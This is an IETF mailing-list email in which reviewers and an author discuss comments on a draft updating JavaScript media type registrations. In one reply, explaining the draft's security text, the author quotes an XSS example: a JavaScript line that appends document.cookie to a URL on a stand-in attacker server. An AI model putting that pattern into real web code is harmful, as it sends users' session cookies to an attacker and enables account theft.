Re: [dispatch] Benjamin Kaduk's No Objection on draft-ietf-dispatch-javascript-mjs-13: (with COMMENT)
Benjamin Kaduk <kaduk@mit.edu> Sat, 08 January 2022 02:25 UTC
Return-Path: <kaduk@mit.edu>
X-Original-To: dispatch@ietfa.amsl.com
Delivered-To: dispatch@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 92A8E3A155F; Fri, 7 Jan 2022 18:25:07 -0800 (PST)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -1.496
X-Spam-Level:
X-Spam-Status: No, score=-1.496 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, KHOP_HELO_FCRDNS=0.399, RCVD_IN_MSPIKE_H3=0.001, RCVD_IN_MSPIKE_WL=0.001, SPF_HELO_NONE=0.001, SPF_NONE=0.001, URIBL_BLOCKED=0.001] autolearn=no autolearn_force=no
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 135TbrpZmYum; Fri, 7 Jan 2022 18:25:03 -0800 (PST)
Received: from outgoing.mit.edu (outgoing-auth-1.mit.edu [18.9.28.11]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 975633A155A; Fri, 7 Jan 2022 18:25:02 -0800 (PST)
Received: from mit.edu ([24.16.140.251]) (authenticated bits=56) (User authenticated as kaduk@ATHENA.MIT.EDU) by outgoing.mit.edu (8.14.7/8.12.4) with ESMTP id 2082OkdW032116 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT); Fri, 7 Jan 2022 21:24:53 -0500
Date: Fri, 07 Jan 2022 18:24:45 -0800
From: Benjamin Kaduk <kaduk@mit.edu>
To: Mathias Bynens <mths@google.com>
Cc: The IESG <iesg@ietf.org>, draft-ietf-dispatch-javascript-mjs@ietf.org, dispatch chairs <dispatch-chairs@ietf.org>, DISPATCH WG <dispatch@ietf.org>, Ben Campbell <ben@nostrum.com>
Message-ID: <20220108022445.GT11486@mit.edu>
References: <164142722748.6967.15810149469713452092@ietfa.amsl.com> <CADizRgZDhsVNky8iXyvbNqfSzB+7u5NoHxwaqCQF+cciO6CP9g@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <CADizRgZDhsVNky8iXyvbNqfSzB+7u5NoHxwaqCQF+cciO6CP9g@mail.gmail.com>
Archived-At: <https://mailarchive.ietf.org/arch/msg/dispatch/c60xy88uybG6Q0hDglTPInssVJ0>
Subject: Re: [dispatch] Benjamin Kaduk's No Objection on draft-ietf-dispatch-javascript-mjs-13: (with COMMENT)
X-BeenThere: dispatch@ietf.org
X-Mailman-Version: 2.1.29
Precedence: list
List-Id: DISPATCH Working Group Mail List <dispatch.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/dispatch>, <mailto:dispatch-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/dispatch/>
List-Post: <mailto:dispatch@ietf.org>
List-Help: <mailto:dispatch-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/dispatch>, <mailto:dispatch-request@ietf.org?subject=subscribe>
X-List-Received-Date: Sat, 08 Jan 2022 02:25:08 -0000
Hi Mathias, Your responses all make sense to me, and the changes in the referenced PR look good. Thanks! -Ben On Fri, Jan 07, 2022 at 10:13:15AM +0100, Mathias Bynens wrote: > Thanks for the review! Replies inline. > > On Thu, Jan 6, 2022 at 1:00 AM Benjamin Kaduk via Datatracker < > noreply@ietf.org> wrote: > > > Benjamin Kaduk has entered the following ballot position for > > draft-ietf-dispatch-javascript-mjs-13: No Objection > > > > When responding, please keep the subject line intact and reply to all > > email addresses included in the To and CC lines. (Feel free to cut this > > introductory paragraph, however.) > > > > > > Please refer to https://www.ietf.org/blog/handling-iesg-ballot-positions/ > > for more information about how to handle DISCUSS and COMMENT positions. > > > > > > The document, along with other ballot positions, can be found here: > > https://datatracker.ietf.org/doc/draft-ietf-dispatch-javascript-mjs/ > > > > > > > > ---------------------------------------------------------------------- > > COMMENT: > > ---------------------------------------------------------------------- > > > > Section 3 > > > > This document does not define how fragment identifiers in resource > > identifiers ([RFC3986], [RFC3987]) for documents labeled with one of > > the media types defined in this document are resolved. An update of > > this document may define processing of fragment identifiers. > > > > This section is the "modules" section; the disclaimer of specification of > > fragment handling seems to apply to both script and module content, and > > thus > > to be misplaced in this section. > > > > Thanks. Addressed in https://github.com/linuxwolf/bmeck-ids/pull/62/files. > > > > Section 5 > > > > Module scripts in ECMAScript can request the fetching and processing > > of additional scripts, called importing. Implementations that > > support modules need to process imported sources in the same way as > > scripts. Further, there may be additional privacy and security > > concerns depending on the location(s) the original script and its > > imported modules are obtained from. For instance, a script obtained > > from "host-a.example" could request to import a script from "host- > > b.example", which could expose information about the executing > > environment (e.g., IP address) to "host-b.example". See the section > > "ECMAScript Language: Scripts and Modules" in [ECMA-262] for details. > > > > Is the referenced "ECMAScript Language: Scripts and Modules" section > > supposed to be providing more details on the importing process, or the > > potential privacy and security concerns? I skimmed through it and found > > nothing noteworthy on the latter, which suggests that perhaps the former > > was > > intended. If that's the case, then reordering the sentences within the > > paragraph might be helpful. > > > > Addressed in https://github.com/linuxwolf/bmeck-ids/pull/62/files. > > This circumstance can further be used to make information, that is > > normally only available to the script, available to a web server by > > encoding the information in the resource identifier of the resource, > > which can further enable eavesdropping attacks. Implementation of > > such facilities is subject to the security considerations of the host > > environment, as discussed above. > > > > What does "the resource" refer to, here? I don't see a previous mention of > > a resource that it would be referring to. Is it perhaps a resource that's > > the target of a request to the web server that is receiving the information > > in question? > > > > It refers to for example, URLs, that can be constructed and requested using > JavaScript/DOM APIs on the Web as part of an XSS attack > <https://owasp.org/www-community/attacks/xss/>: > > 'https://hacker-controlled-server.example.com/log-cookie-data?cookie=' > + document.cookie; > > This content is inherited as-is from RFC4329; we’d rather not make changes > to it as it’s outside the scope of our proposed changes. > > Section 7.1 > > > > It's pretty surprising to see a normative dependency on RFC 4329 when we > > claim to obsolete that document. > > > > Note that the registrations intentionally refer to both the new doc and RFC > 4329: > > Person & email address to contact for further information: See > Author's Address section of [this document] and [RFC4329]. > > Happy to make changes if needed but given the above, the normative > reference seems unsurprising to me. > > > > Appendix B > > > > Looking at the diff from RFC 4329, I also see some text about handling > > application/ecmascript content that has a "version" parameter to the media > > type, that seems to have been removed entirely for this document. Is that > > sufficiently noteworthy to be included in this change listing? > > > > This falls under the list item “Updated various references where the > original has been obsoleted.” which is already listed under the “Changes > from RFC 4329” section. > > The "version" parameter refers to the following old RFC 4329 note: > > For the > application/ecmascript media type, implementations MUST NOT process > content labeled with a "version" parameter as if no such parameter > had been specified; this is typically achieved by treating the > content as unsupported. > > This does not match implementation reality, and Web browsers cannot > implement this restriction without Breaking the Web: > https://mathiasbynens.be/demo/javascript-mime-type The "version" parameter > is just ignored in practice, like any other unspecified parameter, so there > is no need to include any text about it. > > NITS > > > > Section 5 > > > > The programming language defined in [ECMA-262] is not intended to be > > computationally self-sufficient, rather it is expected that the > > computational environment provides facilities to programs to enable > > specific functionality. [...] > > > > The comma usage seems off here. I'm not sure if the sentence overall > > contains a comma splice or not, but probably there should be a comma after > > "rather" regardless of whether the first comma is converted to > > semicolon/full-stop or otherwise. > > > > Good catch. Addressed in > https://github.com/linuxwolf/bmeck-ids/pull/62/files. > > > > Section 6 > > > > application/ecmascript" is to be removed. IANA is requested to add > > the note "OBSOLETED in favor of text/javascript" to all registrations > > except "text/javascript". > > > > Presumably this is "all registrations listed in this document", not "all > > registrations in the registry"... > > > > Indeed. That applies to the rest of the sentence as well, e.g. "All > registrations will point to this document as reference.". > > > > Section 6.2.x > > > > I extracted the various subsections and used diff to compare them. > > Aside from the expected variation in type/subtype name and file extension > > (.es vs .js), there is also variation in: > > > > - whether there is a full stop at the end of the "Change controller" line > > > > Good catch! Fixed. > > > > - some have the "Person & email address to contact for further information" > > listing both this document and RFC 4329, but most just list this > > document. > > > > Fixed. > > > > - text/livescript does not have a note about this registration applying to > > later editions of [ECMA-262]; perhaps that's appropriate for the > > livescript media type. > > > > I’ve made this consistent for all registrations in the document. Your nits > helped me find a few other inconsistencies that I’ve addressed as well. > > Thanks, > Mathias
- [dispatch] Benjamin Kaduk's No Objection on draft… Benjamin Kaduk via Datatracker
- Re: [dispatch] Benjamin Kaduk's No Objection on d… Mathias Bynens
- Re: [dispatch] Benjamin Kaduk's No Objection on d… Benjamin Kaduk